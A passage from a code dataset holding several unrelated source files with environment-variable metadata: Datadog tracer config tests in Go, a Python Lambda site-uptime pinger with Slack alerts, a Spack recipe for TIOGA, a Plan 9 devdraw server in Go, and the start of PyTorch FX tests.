defer os.Unsetenv("DD_TAGS")
c = newConfig()
assert.Equal("1.1.1", c.version)
c = newConfig(WithGlobalTag("version", "1.1.2"))
assert.Equal("1.1.2", c.version)
os.Setenv("DD_VERSION", "1.1.3")
defer os.Unsetenv("DD_VERSION")
c = newConfig(WithGlobalTag("version", "1.1.2"))
assert.Equal("1.1.3", c.version)
c = newConfig(WithGlobalTag("version", "1.1.2"), WithServiceVersion("1.1.4"))
assert.Equal("1.1.4", c.version)
})
}
func TestEnvConfig(t *testing.T) {
t.Run("WithEnv", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(
WithEnv("testing"),
)
assert.Equal("testing", c.env)
})
t.Run("env", func(t *testing.T) {
os.Setenv("DD_ENV", "testing")
defer os.Unsetenv("DD_ENV")
assert := assert.New(t)
c := newConfig()
assert.Equal("testing", c.env)
})
t.Run("WithGlobalTag", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithGlobalTag("env", "testing"))
assert.Equal("testing", c.env)
})
t.Run("DD_TAGS", func(t *testing.T) {
os.Setenv("DD_TAGS", "env:testing")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("testing", c.env)
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(c.env, "")
os.Setenv("DD_TAGS", "env:testing1")
defer os.Unsetenv("DD_TAGS")
c = newConfig()
assert.Equal("testing1", c.env)
c = newConfig(WithGlobalTag("env", "testing2"))
assert.Equal("testing2", c.env)
os.Setenv("DD_ENV", "testing3")
defer os.Unsetenv("DD_ENV")
c = newConfig(WithGlobalTag("env", "testing2"))
assert.Equal("testing3", c.env)
c = newConfig(WithGlobalTag("env", "testing2"), WithEnv("testing4"))
assert.Equal("testing4", c.env)
})
}
func TestStatsTags(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithService("serviceName"), WithEnv("envName"))
c.hostname = "hostName"
tags := statsTags(c)
assert.Contains(tags, "service:serviceName")
assert.Contains(tags, "env:envName")
assert.Contains(tags, "host:hostName")
}
func TestGlobalTag(t *testing.T) {
var c config
WithGlobalTag("k", "v")(&c)
assert.Contains(t, statsTags(&c), "k:v")
}
func TestWithHostname(t *testing.T) {
t.Run("WithHostname", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithHostname("hostname"))
assert.Equal("hostname", c.hostname)
})
t.Run("env", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_SOURCE_HOSTNAME", "hostname-env")
defer os.Unsetenv("DD_TRACE_SOURCE_HOSTNAME")
c := newConfig()
assert.Equal("hostname-env", c.hostname)
})
t.Run("env-override", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_SOURCE_HOSTNAME", "hostname-env")
defer os.Unsetenv("DD_TRACE_SOURCE_HOSTNAME")
c := newConfig(WithHostname("hostname-middleware"))
assert.Equal("hostname-middleware", c.hostname)
})
}
func TestWithTraceEnabled(t *testing.T) {
t.Run("WithTraceEnabled", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithTraceEnabled(false))
assert.False(c.enabled)
})
t.Run("env", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
c := newConfig()
assert.False(c.enabled)
})
t.Run("env-override", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
c := newConfig(WithTraceEnabled(true))
assert.True(c.enabled)
})
}
func TestWithLogStartup(t *testing.T) {
c := newConfig()
assert.True(t, c.logStartup)
WithLogStartup(false)(c)
assert.False(t, c.logStartup)
WithLogStartup(true)(c)
assert.True(t, c.logStartup)
}
|
[
"\"DD_DOGSTATSD_PORT\"",
"\"DD_TRACE_FEATURES\"",
"\"DD_DOGSTATSD_PORT\"",
"\"DD_DOGSTATSD_PORT\"",
"\"DD_AGENT_HOST\"",
"\"DD_DOGSTATSD_PORT\""
] |
[] |
[
"DD_TRACE_FEATURES",
"DD_AGENT_HOST",
"DD_DOGSTATSD_PORT"
] |
[]
|
["DD_TRACE_FEATURES", "DD_AGENT_HOST", "DD_DOGSTATSD_PORT"]
|
go
| 3 | 0 | |
ping/ping.py
|
import boto3
import requests
import os
import json
import random
import datetime
#import traceback
import re
import urllib3
from requests import RequestException
from datetime import datetime
# Disable InsecureRequestWarning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Environment Variables
SLACK_HOOK_URL = os.environ['SLACK_HOOK_URL']
TABLE_NAME = os.environ['TABLE_NAME']
LOG_TABLE_NAME = os.environ['LOG_TABLE_NAME']
QUEUE_NAME = os.environ['QUEUE_NAME']
# Run Domain for Status Code
def lambda_handler(event, context):
for record in event['Records']:
data = json.loads(record['body'])
handle_data(data)
return ""
def handle_data(data):
site_name = data["site_name"]
attempt_num = data['attempt_num']
site_url = site_name
# Determine Website Status
http_status_code = ping(site_url)
print(site_name + " status: " + http_status_code)
if attempt_num > 2:
if site_is_down(http_status_code):
actual_status = "down"
db_results = check_db(site_name, actual_status, http_status_code, site_url)
else:
if site_is_down(http_status_code):
# Send A Retry Message to SQS
attempt_num = attempt_num + 1
add_to_queue(site_name, attempt_num)
else:
actual_status = "up"
db_results = check_db(site_name, actual_status, http_status_code, site_url)
return ""
def site_is_down(http_status_code):
return http_status_code[0] not in ['2','3','4']
# Function to Get HTTP Status Code
def ping(site_url):
# Generate URL with Semi-Random Paramater to Bypass Cache
url = site_url.strip() + "?" + str(random.randint(100000, 999999))
url = re.sub(r'^https?://','', url)
url = "http://" + url
try:
r = requests.get(url, headers={"User-Agent": "demeter"}, timeout=20, verify=False)
http_status_code = str(r.status_code)
except RequestException as e:
#traceback.print_exc()
exception_type = type(e).__name__
http_status_code = exception_type + ": " + str(e)
return http_status_code
def send_slack_message(message):
print("sending message to slack:")
# Send Notification to Slack
try:
r = requests.post(url=SLACK_HOOK_URL, data=json.dumps(message), headers={'Content-Type' : 'application/json'}, timeout=10)
result = r.text
except RequestException as e:
#traceback.print_exc()
exception_type = type(e).__name__
result = exception_type + ": " + str(e)
return result
# Function to add another Message to Queue
def add_to_queue(site_name, attempt_num):
variables = {'site_name': site_name, 'attempt_num': attempt_num}
sqs = boto3.resource('sqs')
queue = sqs.get_queue_by_name(QueueName=QUEUE_NAME)
response = queue.send_message(MessageBody=json.dumps(variables), DelaySeconds=10)
# Function to check the current recorded status of the site and determine if
# a slack message needs to be sent and then to update the database accordingly
def check_db(site_name, actual_status, http_status_code, site_url):
dynamodb1 = boto3.resource('dynamodb').Table(TABLE_NAME)
dynamodb2 = boto3.resource('dynamodb').Table(LOG_TABLE_NAME)
response = dynamodb1.get_item(TableName=TABLE_NAME, Key={'site_name': site_name})
print(response)
try:
db_site_status = response.get('Item').get('site_status')
except:
creation_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :values',ExpressionAttributeValues={':values': 'up'})
attempt_num = 0
add_to_queue(site_name, attempt_num)
else:
print("Database Status: " + db_site_status)
print("Actual Status: " + actual_status)
if db_site_status != actual_status:
timestamp = datetime.now().timestamp()
if actual_status == "up":
up_timestamp = int(timestamp)
down_timestamp = response.get('Item').get('down_timestamp')
site_key = response.get('Item').get('site_key')
time_diff = up_timestamp - down_timestamp
outage_time = convert_time(time_diff)
text = "<!here> " + site_name + " - STATUS: UP - OUTAGE TIME: " + outage_time + " - URL: " + site_url
# Send Slack Message
message = {"attachments": [{"text": text,"color": "#22bb33"}]}
result = send_slack_message(message)
# Log to Demeter Site Status Table
db_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :value1, up_timestamp = :value2',ExpressionAttributeValues={':value1': 'up', ':value2': up_timestamp})
# Log to Demeter Downtime Log Table
db_log_response = dynamodb2.update_item(TableName=LOG_TABLE_NAME,Key={'site_key':site_key},UpdateExpression='SET up_timestamp = :value1, outage_time = :value2',ExpressionAttributeValues={':value1': up_timestamp, ':value2': outage_time})
print(db_response)
print(db_log_response)
elif actual_status == "down":
text = "<!here> " + site_name + " - STATUS: DOWN - STATUS CODE: " + http_status_code + " - URL: " + site_url
message = {"attachments": [{"text": text,"color": "bb2124"}]}
result = send_slack_message(message)
down_timestamp = int(timestamp)
site_key = site_name + '-' + str(down_timestamp)
# Log to Demeter Site Status Table
db_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :value1, site_key = :value2, down_timestamp = :value3',ExpressionAttributeValues={':value1': 'down', ':value2': site_key, ':value3': down_timestamp})
# Log to Demeter Downtime Log Table
db_log_response = dynamodb2.update_item(TableName=LOG_TABLE_NAME,Key={'site_key':site_key},UpdateExpression='SET status_code = :value1, down_timestamp = :value2',ExpressionAttributeValues={':value1': http_status_code, ':value2': down_timestamp})
print("LOG ERRORS: " + site_name + " IS DOWN - SITE_KEY IS " + site_key)
print(db_response)
print(db_log_response)
def convert_time(seconds):
min, sec = divmod(seconds, 60)
hour, min = divmod(min, 60)
return "%d Hours %02d Minutes %02d Seconds " % (hour, min, sec)
|
[] |
[] |
[
"TABLE_NAME",
"SLACK_HOOK_URL",
"QUEUE_NAME",
"LOG_TABLE_NAME"
] |
[]
|
["TABLE_NAME", "SLACK_HOOK_URL", "QUEUE_NAME", "LOG_TABLE_NAME"]
|
python
| 4 | 0 | |
etc/repos/exawind/packages/tioga/package.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
import os
from spack import *
class Tioga(CMakePackage, CudaPackage):
"""Topology Independent Overset Grid Assembly (TIOGA)"""
homepage = "https://github.com/jsitaraman/tioga"
git = "https://github.com/jsitaraman/tioga.git"
maintainers = ['jsitaraman', 'sayerhs']
generator = ('Ninja'
if os.environ.get('EXAWIND_MAKE_TYPE','').lower() == 'ninja'
else 'Unix Makefiles')
version('develop', branch='exawind')
version('master', branch='master')
variant('shared', default=sys.platform != 'darwin',
description="Build shared libraries")
variant('pic', default=True,
description="Enable position independent code")
variant('nodegid', default=True,
description="Enable support for global Node IDs")
variant('timers', default=False,
description="Enable timers")
variant('stats', default=False,
description="Enable output of holecut stats")
variant('cxxstd', default='11',
values=('11', '14'), multi=False,
description="C++ standard to use")
depends_on('ninja-fortran',
type='build',
when=(generator == 'Ninja'))
depends_on('mpi')
depends_on('[email protected]:', when='+cuda')
def cmake_args(self):
args = [
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
self.define_from_variant('CMAKE_POSITION_INDEPENDENT_CODE', 'pic'),
self.define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
self.define_from_variant('TIOGA_HAS_NODEGID', 'nodegid'),
self.define_from_variant('TIOGA_ENABLE_TIMERS', 'timers'),
self.define_from_variant('TIOGA_OUTPUT_STATS', 'stats'),
self.define_from_variant('TIOGA_ENABLE_CUDA', 'cuda'),
]
if '+cuda' in self.spec:
args.append(self.define('CMAKE_CUDA_SEPARABLE_COMPILATION', True))
# Currently TIOGA only supports one device arch during specialization
cuda_arch = self.spec.variants['cuda_arch'].value
if cuda_arch:
arch_sorted = list(sorted(cuda_arch, reverse=True))
args.append(self.define('TIOGA_CUDA_SM', arch_sorted[0]))
if 'darwin' in self.spec.architecture:
args.append(self.define('CMAKE_MACOSX_RPATH', True))
return args
|
[] |
[] |
[
"EXAWIND_MAKE_TYPE"
] |
[]
|
["EXAWIND_MAKE_TYPE"]
|
python
| 1 | 0 | |
cmd/devdraw/srv.go
|
/*
* Window system protocol server.
*/
package main
import (
"flag"
"fmt"
"io"
"log"
"os"
"strconv"
"time"
"9fans.net/go/draw"
"9fans.net/go/draw/drawfcall"
"9fans.net/go/draw/memdraw"
)
var client0 *Client
var trace int = 0
var srvname string
var afd int
var adir string
func usage() {
fmt.Fprintf(os.Stderr, "usage: devdraw (don't run directly)\n")
os.Exit(2)
}
func main() {
log.SetPrefix("devdraw: ")
log.SetFlags(0)
flag.BoolVar(new(bool), "D", false, "ignored")
flag.BoolVar(new(bool), "f", false, "ignored")
flag.BoolVar(new(bool), "g", false, "ignored")
flag.BoolVar(new(bool), "b", false, "ignored")
flag.StringVar(&srvname, "s", srvname, "service name")
flag.Usage = usage
flag.Parse()
memdraw.Init()
p := os.Getenv("DEVDRAWTRACE")
if p != "" {
trace, _ = strconv.Atoi(p)
}
if srvname == "" {
client0 = new(Client)
client0.displaydpi = 100
/*
* Move the protocol off stdin/stdout so that
* any inadvertent prints don't screw things up.
*/
client0.rfd = os.Stdin
client0.wfd = os.Stdout
os.Stdin, _ = os.Open("/dev/null")
os.Stdout, _ = os.Create("/dev/null")
}
gfx_main()
}
func gfx_started() {
if srvname == "" {
// Legacy mode: serving single client on pipes.
go serveproc(client0)
return
}
panic("server mode")
/*
// Server mode.
ns := getns()
if ns == nil {
sysfatal("out of memory")
}
addr := fmt.Sprintf("unix!%s/%s", ns, srvname)
free(ns)
if addr == nil {
sysfatal("out of memory")
}
afd = announce(addr, adir)
if afd < 0 {
sysfatal("announce %s: %r", addr)
}
go listenproc()
*/
}
/*
func listenproc() {
for {
var dir string
fd := listen(adir, dir)
if fd < 0 {
sysfatal("listen: %r")
}
c := new(Client)
if c == nil {
fmt.Fprintf(os.Stderr, "initdraw: allocating client0: out of memory")
abort()
}
c.displaydpi = 100
c.rfd = fd
c.wfd = fd
go serveproc(c)
}
}
*/
func serveproc(c *Client) {
for {
b, err := drawfcall.ReadMsg(c.rfd)
if err != nil {
if err != io.EOF {
fmt.Fprintf(os.Stderr, "serveproc: cannot read message: %v\n", err)
}
break
}
var m drawfcall.Msg
if err := m.Unmarshal(b); err != nil {
fmt.Fprintf(os.Stderr, "serveproc: cannot convert message: %v\n", err)
break
}
if trace != 0 {
log.Printf("%v <- %v\n", time.Now().UnixNano()/1000000, &m)
}
runmsg(c, &m)
}
if c == client0 {
rpc_shutdown()
os.Exit(0)
}
}
func replyerror(c *Client, m *drawfcall.Msg, err error) {
m.Type = drawfcall.Rerror
m.Error = err.Error()
replymsg(c, m)
}
/*
* Handle a single wsysmsg.
* Might queue for later (kbd, mouse read)
*/
var runmsg_buf [65536]byte
func runmsg(c *Client, m *drawfcall.Msg) {
switch m.Type {
case drawfcall.Tctxt:
c.wsysid = m.ID
replymsg(c, m)
case drawfcall.Tinit:
i, err := rpc_attach(c, m.Label, m.Winsize)
if err != nil {
replyerror(c, m, err)
break
}
// println("I", i)
draw_initdisplaymemimage(c, i)
replymsg(c, m)
case drawfcall.Trdmouse:
c.eventlk.Lock()
if (c.mousetags.wi+1)%len(c.mousetags.t) == c.mousetags.ri {
c.eventlk.Unlock()
replyerror(c, m, fmt.Errorf("too many queued mouse reads"))
break
}
c.mousetags.t[c.mousetags.wi] = int(m.Tag)
c.mousetags.wi++
if c.mousetags.wi == len(c.mousetags.t) {
c.mousetags.wi = 0
}
c.mouse.stall = 0
matchmouse(c)
c.eventlk.Unlock()
case drawfcall.Trdkbd, drawfcall.Trdkbd4:
c.eventlk.Lock()
if (c.kbdtags.wi+1)%len(c.kbdtags.t) == c.kbdtags.ri {
c.eventlk.Unlock()
replyerror(c, m, fmt.Errorf("too many queued keyboard reads"))
break
}
ext := 0
if m.Type == drawfcall.Trdkbd4 {
ext = 1
}
c.kbdtags.t[c.kbdtags.wi] = int(m.Tag)<<1 | ext
c.kbdtags.wi++
if c.kbdtags.wi == len(c.kbdtags.t) {
c.kbdtags.wi = 0
}
c.kbd.stall = 0
matchkbd(c)
c.eventlk.Unlock()
case drawfcall.Tmoveto:
c.impl.rpc_setmouse(c, m.Mouse.Point)
replymsg(c, m)
case drawfcall.Tcursor:
if m.Arrow {
c.impl.rpc_setcursor(c, nil, nil)
} else {
cur := (*draw.Cursor)(&m.Cursor)
cur2 := (*draw.Cursor2)(&m.Cursor2)
*cur2 = draw.ScaleCursor(*cur)
c.impl.rpc_setcursor(c, cur, cur2)
}
replymsg(c, m)
case drawfcall.Tcursor2:
if m.Arrow {
c.impl.rpc_setcursor(c, nil, nil)
} else {
c.impl.rpc_setcursor(c, (*draw.Cursor)(&m.Cursor), (*draw.Cursor2)(&m.Cursor2))
}
replymsg(c, m)
case drawfcall.Tbouncemouse:
c.impl.rpc_bouncemouse(c, draw.Mouse(m.Mouse))
replymsg(c, m)
case drawfcall.Tlabel:
c.impl.rpc_setlabel(c, m.Label)
replymsg(c, m)
case drawfcall.Trdsnarf:
m.Snarf = rpc_getsnarf()
replymsg(c, m)
m.Snarf = nil
case drawfcall.Twrsnarf:
rpc_putsnarf(m.Snarf)
replymsg(c, m)
case drawfcall.Trddraw:
n := m.Count
if n > len(runmsg_buf) {
n = len(runmsg_buf)
}
n, err := draw_dataread(c, runmsg_buf[:n])
if err != nil {
replyerror(c, m, err)
} else {
m.Count = n
m.Data = runmsg_buf[:n]
replymsg(c, m)
}
case drawfcall.Twrdraw:
if _, err := draw_datawrite(c, m.Data); err != nil {
replyerror(c, m, err)
} else {
m.Count = len(m.Data)
replymsg(c, m)
}
case drawfcall.Ttop:
c.impl.rpc_topwin(c)
replymsg(c, m)
case drawfcall.Tresize:
c.impl.rpc_resizewindow(c, m.Rect)
replymsg(c, m)
}
}
/*
* drawfcall.Reply to m.
*/
func replymsg(c *Client, m *drawfcall.Msg) {
/* T -> R msg */
if m.Type%2 == 0 {
m.Type++
}
if trace != 0 {
fmt.Fprintf(os.Stderr, "%d -> %v\n", time.Now().UnixNano()/1000000, m)
}
c.wfdlk.Lock()
if _, err := c.wfd.Write(m.Marshal()); err != nil {
fmt.Fprintf(os.Stderr, "client write: %v\n", err)
}
c.wfdlk.Unlock()
}
/*
* Match queued kbd reads with queued kbd characters.
*/
func matchkbd(c *Client) {
if c.kbd.stall != 0 {
return
}
for c.kbd.ri != c.kbd.wi && c.kbdtags.ri != c.kbdtags.wi {
tag := c.kbdtags.t[c.kbdtags.ri]
c.kbdtags.ri++
var m drawfcall.Msg
m.Type = drawfcall.Rrdkbd
if tag&1 != 0 {
m.Type = drawfcall.Rrdkbd4
}
m.Tag = uint8(tag >> 1)
if c.kbdtags.ri == len(c.kbdtags.t) {
c.kbdtags.ri = 0
}
m.Rune = c.kbd.r[c.kbd.ri]
c.kbd.ri++
if c.kbd.ri == len(c.kbd.r) {
c.kbd.ri = 0
}
replymsg(c, &m)
}
}
// matchmouse matches queued mouse reads with queued mouse events.
// It must be called with c->eventlk held.
func matchmouse(c *Client) {
for c.mouse.ri != c.mouse.wi && c.mousetags.ri != c.mousetags.wi {
var m drawfcall.Msg
m.Type = drawfcall.Rrdmouse
m.Tag = uint8(c.mousetags.t[c.mousetags.ri])
c.mousetags.ri++
if c.mousetags.ri == len(c.mousetags.t) {
c.mousetags.ri = 0
}
m.Mouse = drawfcall.Mouse(c.mouse.m[c.mouse.ri])
m.Resized = c.mouse.resized
c.mouse.resized = false
/*
if(m.resized)
fmt.Fprintf(os.Stderr, "sending resize\n");
*/
c.mouse.ri++
if c.mouse.ri == len(c.mouse.m) {
c.mouse.ri = 0
}
replymsg(c, &m)
}
}
func gfx_mouseresized(c *Client) {
gfx_mousetrack(c, -1, -1, -1, ^uint32(0))
}
func gfx_mousetrack(c *Client, x int, y int, b int, ms uint32) {
c.eventlk.Lock()
if x == -1 && y == -1 && b == -1 && ms == ^uint32(0) {
var copy *draw.Mouse
// repeat last mouse event for resize
if c.mouse.ri == 0 {
copy = &c.mouse.m[len(c.mouse.m)-1]
} else {
copy = &c.mouse.m[c.mouse.ri-1]
}
x = copy.Point.X
y = copy.Point.Y
b = copy.Buttons
ms = copy.Msec
c.mouse.resized = true
}
if x < c.mouserect.Min.X {
x = c.mouserect.Min.X
}
if x > c.mouserect.Max.X {
x = c.mouserect.Max.X
}
if y < c.mouserect.Min.Y {
y = c.mouserect.Min.Y
}
if y > c.mouserect.Max.Y {
y = c.mouserect.Max.Y
}
// If reader has stopped reading, don't bother.
// If reader is completely caught up, definitely queue.
// Otherwise, queue only button change events.
if c.mouse.stall == 0 {
if c.mouse.wi == c.mouse.ri || c.mouse.last.Buttons != b {
m := &c.mouse.last
m.Point.X = x
m.Point.Y = y
m.Buttons = b
m.Msec = ms
c.mouse.m[c.mouse.wi] = *m
c.mouse.wi++
if c.mouse.wi == len(c.mouse.m) {
c.mouse.wi = 0
}
if c.mouse.wi == c.mouse.ri {
c.mouse.stall = 1
c.mouse.ri = 0
c.mouse.wi = 1
c.mouse.m[0] = *m
}
matchmouse(c)
}
}
c.eventlk.Unlock()
}
// kputc adds ch to the keyboard buffer.
// It must be called with c->eventlk held.
func kputc(c *Client, ch rune) {
c.kbd.r[c.kbd.wi] = ch
c.kbd.wi++
if c.kbd.wi == len(c.kbd.r) {
c.kbd.wi = 0
}
if c.kbd.ri == c.kbd.wi {
c.kbd.stall = 1
}
matchkbd(c)
}
// gfx_abortcompose stops any pending compose sequence,
// because a mouse button has been clicked.
// It is called from the graphics thread with no locks held.
func gfx_abortcompose(c *Client) {
c.eventlk.Lock()
if c.kbd.alting {
c.kbd.alting = false
c.kbd.nk = 0
}
c.eventlk.Unlock()
}
// gfx_keystroke records a single-rune keystroke.
// It is called from the graphics thread with no locks held.
func gfx_keystroke(c *Client, ch rune) {
c.eventlk.Lock()
if ch == draw.KeyAlt {
c.kbd.alting = !c.kbd.alting
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
if ch == draw.KeyCmd+'r' {
if c.forcedpi != 0 {
c.forcedpi = 0
} else if c.displaydpi >= 200 {
c.forcedpi = 100
} else {
c.forcedpi = 225
}
c.eventlk.Unlock()
c.impl.rpc_resizeimg(c)
return
}
if !c.kbd.alting {
kputc(c, ch)
c.eventlk.Unlock()
return
}
if c.kbd.nk >= len(c.kbd.k) { // should not happen
c.kbd.nk = 0
}
c.kbd.k[c.kbd.nk] = ch
c.kbd.nk++
ch = toLatin1(c.kbd.k[:c.kbd.nk])
if ch > 0 {
c.kbd.alting = false
kputc(c, ch)
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
if ch == -1 {
c.kbd.alting = false
for i := 0; i < c.kbd.nk; i++ {
kputc(c, c.kbd.k[i])
}
c.kbd.nk = 0
c.eventlk.Unlock()
return
}
// need more input
c.eventlk.Unlock()
return
}
|
[
"\"DEVDRAWTRACE\""
] |
[] |
[
"DEVDRAWTRACE"
] |
[]
|
["DEVDRAWTRACE"]
|
go
| 1 | 0 | |
test/test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
